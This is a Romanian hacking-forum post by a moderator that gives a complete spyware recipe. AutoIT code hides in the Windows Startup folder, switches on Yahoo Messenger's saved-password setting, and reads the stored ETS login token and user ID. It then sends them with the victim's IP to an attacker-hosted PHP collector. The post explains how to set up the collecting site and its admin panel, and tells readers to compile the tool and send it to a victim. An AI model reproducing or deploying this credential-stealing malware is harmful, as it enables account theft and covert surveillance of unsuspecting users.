Jump to content
Dragos

ETS Grabber - metoda spyware

Recommended Posts

  • Moderators

Am vazut postul lui willboy si m-am gandit sa postez si eu metoda care o folosesc.

Avem nevoie de 2 lucruri : AutoIT si un site ce accepta gazduire de fisiere PHP. Pentru al doilea, recomand Free Web Hosting Area.

1. AutoIT

Deschidem AutoIT si scriem urmatorul cod


#notrayicon
#include <inet.au3>

if not fileexists ("C:\Documents and Settings\" & @username & "\Start Menu\Programs\Startup\" & @scriptname) then
filecopy (@scriptname, "C:\Documents and Settings\" & @username & "\Start Menu\Programs\Startup\" & @scriptname)
endif

$pagina = "http://siteultau.freetzi.com/grabber/index.php"
$ip = _getip()
$date = @HOUR & ":" & @MIN & ":" & @SEC

regwrite ("HKEY_CURRENT_USER\Software\Yahoo\Pager","Auto Login","REG_DWORD",1)
regwrite ("HKEY_CURRENT_USER\Software\Yahoo\Pager","Save Password","REG_DWORD",1)
$ets = regread ("HKEY_CURRENT_USER\Software\Yahoo\Pager","ETS")
$id = regread ("HKEY_CURRENT_USER\Software\Yahoo\Pager","Yahoo! User ID")

if $ets<>"" and $id<>"" Then
$paginaint = $pagina & "?ets=" & $ets & "&user=" & $id & "&ip=" & $ip & "&date=" & $date
_inetgetsource ($paginaint)
endif

Acest cod va pune virusul la startup si NU va crea un fisier cu datele din registri ci va trimite datele catre un site.

2. Site-ul

Sa incepem cu site-ul. Creati un site gen siteultau.freetzi.com si puneti-l la scriptul AutoIT la variabila $pagina. Descarcati scriptul site-ului de aici si puneti-l pe host folosind protocolul FTP (programe recomandate : Filezilla sau Total Commander). Nu uitati sa puneti CHMOD 777 pe cookies.txt

Acum, compilati spyware-ul dupa ce ati scris site-ul si trimiteti-l la victima.

Daca va avea ETS-ul deja memorat in registri, datele se vor trimite instant catre site-ul vostru (PS : pentru a intra in panoul de administrare : siteultau.freetzi.com/admin.php ; datele initiale sunt admin:parola ; se pot modifica din fisierul data.php).

Daca nu il va avea memorat, ETS-ul va fi trimis dupa ce va restarta calculatorul si isi va scrie numele si parola in messenger (majoritatea persoanelor nu observa casuta cu memorare ID & parola ca e bifata).

Have fun!

Edited by Dragos
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...